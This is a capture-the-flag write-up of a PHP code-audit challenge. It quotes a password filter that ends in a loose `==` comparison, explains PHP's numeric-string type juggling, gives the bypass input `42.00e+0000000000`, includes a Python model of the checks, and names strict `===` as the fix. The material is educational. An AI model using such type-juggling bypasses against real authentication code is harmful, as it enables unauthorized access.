Right-click and view the page source; there is a hint pointing at source.txt, so open that link.
```php
<?php
if ("POST" == $_SERVER['REQUEST_METHOD'])
{
    $password = $_POST['password'];
    // Check 1: at least 12 visible (non-whitespace) characters
    if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password))
    {
        echo 'Wrong Format';
        exit;
    }
    while (TRUE)
    {
        // Check 2: at least 6 runs of punct / digit / upper / lower characters
        $reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
        if (6 > preg_match_all($reg, $password, $arr))
            break;
        // Check 3: at least 3 of the 4 character classes must be present
        $c = 0;
        $ps = array('punct', 'digit', 'upper', 'lower');
        foreach ($ps as $pt)
        {
            if (preg_match("/[[:$pt:]]+/", $password))
                $c += 1;
        }
        if ($c < 3) break;
        // Loose comparison: the weak point of the whole filter
        if ("42" == $password)
            require 'flag文件';   // "flag文件" = the flag file (placeholder in the writeup)
        else echo 'Wrong password';
        exit;
    }
}
```
The submitted password has to pass three regex checks, and only then is it compared with `"42" == $password`; the flag is only included when that loose comparison is true.

The three regex checks are:

- at least 12 visible characters (`[[:graph:]]{12,}`, so no whitespace);
- when the string is cut into runs of consecutive uppercase letters, lowercase letters, digits and punctuation, there must be at least six runs. For example, `a12SD+io8` splits into `a`, `12`, `SD`, `+`, `io`, `8`, i.e. six runs;
- at least three of the four character classes (uppercase, lowercase, digit, punctuation) must appear.

Note that the last two checks sit inside the `while (TRUE)` loop and `break` out of it on failure, so a password that fails them produces no output at all; only the format check prints `Wrong Format`.
The bypass relies on how PHP's loose comparison (`==`) treats two numeric strings: they are converted to numbers and compared numerically, so different spellings of the same number are "equal":

```php
var_dump("1" == "01");    // 1 == 1     -> true
var_dump("10" == "1e1");  // 10 == 10   -> true
var_dump(100 == "1e2");   // 100 == 100 -> true
```

Based on this we can build a password that satisfies all three regex checks and still loosely equals `"42"`:

    42.00e+0000000000

It is 17 visible characters, splits into six runs (`42`, `.`, `00`, `e`, `+`, `0000000000`), contains three classes (digit, punctuation, lowercase), and as a numeric string evaluates to 42.0, so `"42" == "42.00e+0000000000"` is true. The fix on the server side is a strict comparison (`===`), which compares the strings byte for byte.
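To make the reasoning above checkable offline, here is a Python re-implementation of the filter (an added example, not code from the original post or the challenge). It assumes the POSIX classes can be spelled out as plain ASCII ranges (Python's `re` has no `[[:punct:]]` syntax) and models PHP 7's rule that two numeric strings compare numerically under `==`; the names `php_loose_equals` and `check_password` are mine.

```python
"""Python model of the challenge's password filter and of PHP's loose '=='.

Added example: reproduces the three regex checks from the PHP source and lets
you verify which payloads reach the flag under loose vs. strict comparison.
"""
import re

# POSIX classes from the PHP regexes, written as ASCII ranges (assumption: ASCII locale).
GRAPH = r"[\x21-\x7e]"           # [[:graph:]] : printable, non-space
PUNCT = r"[!-/:-@\[-`{-~]"       # [[:punct:]] : printable, non-alphanumeric, non-space
DIGIT = r"[0-9]"
UPPER = r"[A-Z]"
LOWER = r"[a-z]"

FORMAT_RE = re.compile(f"^{GRAPH}{{12,}}$")
SEGMENT_RE = re.compile(f"(?:{PUNCT}+|{DIGIT}+|{UPPER}+|{LOWER}+)")
CLASS_RES = [re.compile(f"{c}+") for c in (PUNCT, DIGIT, UPPER, LOWER)]

# PHP 7 numeric string: optional leading whitespace, sign, int or float, optional exponent.
PHP_NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP 7 '==' between two strings.

    If both sides are numeric strings they are compared as numbers, otherwise
    byte for byte. This is exactly what "42" == "42.00e+0000000000" exploits.
    """
    if PHP_NUMERIC_RE.match(a) and PHP_NUMERIC_RE.match(b):
        return float(a) == float(b)
    return a == b


def check_password(password: str, strict: bool = False) -> str:
    """Mirror the PHP control flow; return what the script would output.

    'flag' stands for the require of the flag file. An empty string means the
    while(TRUE) loop was left via break, which prints nothing in the original.
    strict=True swaps '==' for '===' to show the fix.
    """
    # Check 1: at least 12 visible characters
    if not FORMAT_RE.match(password):
        return "Wrong Format"
    # Check 2: at least 6 runs of punct/digit/upper/lower
    if len(SEGMENT_RE.findall(password)) < 6:
        return ""
    # Check 3: at least 3 of the 4 classes present
    if sum(1 for r in CLASS_RES if r.search(password)) < 3:
        return ""
    equal = (password == "42") if strict else php_loose_equals("42", password)
    return "flag" if equal else "Wrong password"


if __name__ == "__main__":
    payload = "42.00e+0000000000"                      # payload from the writeup
    print(SEGMENT_RE.findall(payload))                 # the six runs
    print("loose :", check_password(payload))          # flag
    print("strict:", check_password(payload, True))    # Wrong password
```

Running it prints the six runs the segment regex finds in the payload, then shows that the same input reaches the flag under loose comparison and is rejected once the comparison is strict.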
PHP code audit challenge
Original URL: http://www.cnblogs.com/name1ess/p/7956461.html